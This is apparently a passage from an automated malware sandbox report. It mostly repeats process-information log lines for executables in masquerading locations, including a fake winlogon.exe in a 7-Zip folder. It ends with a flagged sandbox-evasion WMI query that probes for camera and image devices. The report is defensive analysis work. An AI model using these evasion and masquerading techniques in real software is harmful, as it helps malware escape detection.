                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
